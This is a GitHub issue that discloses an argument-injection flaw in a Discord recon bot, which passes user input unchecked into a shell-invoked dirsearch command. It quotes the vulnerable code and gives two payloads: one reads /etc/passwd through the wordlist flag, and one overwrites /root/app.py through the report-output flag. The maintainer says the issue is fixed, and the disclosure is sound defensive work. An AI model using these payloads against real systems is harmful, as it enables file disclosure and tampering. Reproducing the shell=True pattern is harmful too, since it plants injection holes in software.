### ISSUE TITLE
LFI and File Write using dirsearch arguments

### ISSUE THREAD

**Issue by omarbdrn** [DEMON1A/Discord-Recon#12]
### Vulnerable Code
```
await ctx.send(f"**Running Your Dirsearch Scan, We Will Send The Results When It's Done**")
Process = subprocess.Popen(f'python3 dirsearch.py -u {argument} -e * -b' , shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
Output = Process.communicate()[0].decode('UTF-8')
Output = removeColors.Remove(Output); chdir(MainPath)
```

By using -w argument we can read any file using it as an wordlist for dirsearch

Payload : .dirsearch http://myserver/ -w /etc/passwd

Also their is an issue that you can overwrite files using output arguments as --plain-text-report

.dirsearch http://myserver/ --plain-text-report /root/app.py

**Comment by DEMON1A** [comment]
- This issue has been fixed at 8892591
